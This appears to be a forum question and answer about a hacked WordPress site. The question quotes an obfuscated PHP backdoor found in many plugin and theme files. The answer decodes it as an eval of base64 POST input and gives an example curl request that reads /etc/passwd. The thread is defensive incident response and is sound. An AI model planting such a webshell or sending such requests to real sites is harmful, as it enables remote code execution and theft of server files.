Suspicious code found in my WordPress site - How to fix?

Question

One of my site was hacked last night and some porno content was placed on my site.

What I have done:

I have removed manually the adult content from site by using FTP.

My website is up now and working fine. But, still I am able to find some code in my plugin and theme files. Which was not written by me, Code is as below:

   <?php 
        $sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
    ?>

What my queries are:

• What this code stands for, what is this doing?
• Is this harmful?
• Should I remove this code from my files?
• Is this will make any effect on my site if removed?

Other Code Suggestions Required:

This sort of code is available in 100+ files. Is there any method to remove code from all files in once? Or any method to keep code and just make it disinfect? so, it will save my time to remove code manually from too much files.

Answer 1

What this code stands for, what is this doing?

This code is a backdoor which can be used by an attacker to execute arbitrary code. This is what the code intends to do.

<?php
eval( base64_decode( $_POST['n842e1c'] ) );

An attacker can make a post request to this file with his encoded payload in POST parameter n842e1c and execute PHP code.

Example:

curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE

Here this ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs= is the BASE64 encoded string of echo readfile('/etc/passwd');.

Is this harmful?

Yes

Should I remove this code from my files?

Yes

Will this make any effect on my site if removed?

No

Here are some tips to help you clean the website. Also, follow this official post by wordpress to take necessary steps.